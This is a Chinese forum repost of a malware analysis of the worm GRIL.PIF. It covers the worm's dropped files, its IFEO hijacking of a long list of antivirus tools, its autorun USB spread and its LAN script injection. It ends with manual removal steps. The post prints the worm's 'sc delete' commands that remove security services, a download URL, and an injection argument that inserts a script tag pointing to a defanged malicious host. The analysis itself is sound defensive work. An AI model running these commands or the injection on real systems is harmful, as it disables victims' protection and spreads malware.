GRIL.PIF 查杀

Simen.Resh@d

转载自:http://hi.baidu.com/%B9%C2%B6%C0 ... 0276df9123d91b.html

文件名称：GRIL.PIF
文件大小：30208 bytes
病毒命名：
Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb
BitDefender 7.2 2009.04.18 Gen:Trojan.Heur.1024456363
Symantec 1.4.4.12 2009.04.19 Trojan.KillAV
加壳方式：PE_Patch.UPX
文件MD5：cbda45b0fd2a779dddbd8a4807a6be6c
行为：
1、启动时查找互斥体“AS21a669aSSE”，有则退出进程，防止多个病毒体被运行
2、释放文件：
C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节
C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\isb.ini = 141 字节 (病毒下载列表)
C:\WINDOWS\system32\LINKINFO.dll（主体）
3、调用cmd /c sc delete avp命令，删除卡巴斯基服务
4、连接网络：http://a.wuc9.com/tt.txt保存至C:\WINDOWS\system32\isb.ini，下载其他流氓程序！
5、修改IFEO，启动重定向劫持，屏蔽常见的安全工具
360rpt.EXE
360safe.EXE
360safebox.EXE
360tray.EXE
ANTIARP.EXE
ArSwp.EXE
Ast.EXE
AutoRun.EXE
AutoRunKiller.EXE
AvMonitor.EXE
AVP.COM
AVP.EXE
CCenter.EXE
Frameworkservice.EXE
GFUpd.EXE
GuardField.EXE
HijackThis.EXE
IceSword.EXE
Iparmor.EXE
KASARP.EXE
kav32.EXE
KAVPFW.EXE
kavstart.EXE
kissvc.EXE
kmailmon.EXE
KPfwSvc.EXE
KRegEx.EXE
KVMonxp.KXP
KVSrvXP.EXE
KVWSC.EXE
kwatch.EXE
Mmsk.EXE
Navapsvc.EXE
nod32krn.EXE
Nod32kui.EXE
PFW.EXE
QQDoctor.EXE
RAV.EXE
RavMon.EXE
RavMonD.EXE
Ravservice.EXE
RavStub.EXE
RavTask.EXE
RAVTRAY.EXE
Regedit.EXE
rfwmain.EXE
rfwProxy.EXE
rfwsrv.EXE
Rfwstub.EXE
RsAgent.EXE
Rsaupd.EXE
RsMain.EXE
rsnetsvr.EXE
RSTray.EXE
Runiep.EXE
safeboxTray.EXE
ScanFrm.EXE
SREngLdr.EXE
TrojanDetector.EXE
Trojanwall.EXE
TrojDie.KXP
VPC32.EXE
VPTRAY.EXE
WOPTILITIES.EXE
5、查找窗口，发现以下文字则会被关闭：
essact
egui
RavTray
ccApp
vptray
KavStart
360Safebox
360Safetray
AfxControlBar42s
IceSword
SYSTEM
杀毒   
清理
SREng
超级巡警
金山
Anti
Mcafee
狙剑
主动防御
微点
绿鹰
主动
上报
举报
瑞星
NOD32
拦截
监控
安全卫士
监视
冰刃的关闭方式是向退出时的确认框发送“是”消息，关闭冰刃。
6、查找可用的磁盘，在目录下拷贝病毒为autorun.inf和GRIL.PIF
并每隔一段时间查找可用磁盘，完成移动盘感染
7、时隔5秒为周期，以递增方式访问192.168.0.1至192.168.0.100IP段，应该是局域传播
由于测试局限性，该行为未实现。
8、调用CMD，删除服务：
cmd.exe /c sc delete ekrn
cmd.exe /c sc delete RsRavMon
cmd.exe /c sc delete RavTask
cmd.exe /c sc delete RsScanSrv
cmd.exe /c sc delete RavCCenter
重启后诺顿和瑞星报销
9、还有这些服务也会被禁用：
Norton AntiVirus Server
McAfee Framework
Symantec AntiVirus Definition Watcher
Symantec AntiVirus Drivers Services
Norton AntiVirus
norton AntiVirus server
Kingsoft Internet Security Common Service
10、启动另一个线程：C:\WINDOWS\system32\36osafe.exe（注意是36O不是360）
在192.168.203.2-192.168.203.254的数据包内加入一个框架，参数为：
-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert "<script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js></script>"
解密后hxxp://360.cdd1.com/lg.js
相继连接以下站点：

hxxp://371gw.com/pai/ll.htm
hxxp://371gw.com/pai/4.htm
hxxp://371gw.com/pai/1.js
hxxp://371gw.com/pai/all.js
hxxp://371gw.com/pai/1.htm
hxxp://371gw.com/pai/ie.swf
hxxp://371gw.com/pai/all.htm
hxxp://371gw.com/pai/ll.htm
crypthtml和unescape、shellcode的混合加密
有Real，Flash，Ms0614等漏洞
下载的病毒跟这个一样！
11、删除以下注册表键值破坏安全模式：
SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
12、修改注册表：
SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall
使隐藏文件不显示，保护病毒文件
简单的解决方法：
1、下载SREng，删除启动：
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <360safe><C:\WINDOWS\Fonts\wuauclt.exe> []
SREng能检测到的所有IFEO键值
[lfdl / lfdl][Stopped/Manual Start]
<\??\C:\WINDOWS\fonts\lfdl.sys><N/A>

[nbkkt / nbkkt][Stopped/Manual Start]
<\??\C:\WINDOWS\Fonts\nbkkt.fon><N/A>
[acpidisk / acpidisk][Running/Auto Start]
<\??\C:\WINDOWS\system32\drivers\acpidisk.sys><N/A>
pnpmem驱动
2、重启计算机，删除文件：
C:\WINDOWS\Fonts\svchost.exe 11776 字节
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节
C:\WINDOWS\system32\36osafe.exe, 13531 字节
C:\WINDOWS\system32\LINKINFO.dll
3、全部删除后解决，电脑可正常使用！

SiMen.haah

一明兄太专业了...

Neuropathy

我看不懂啊。。。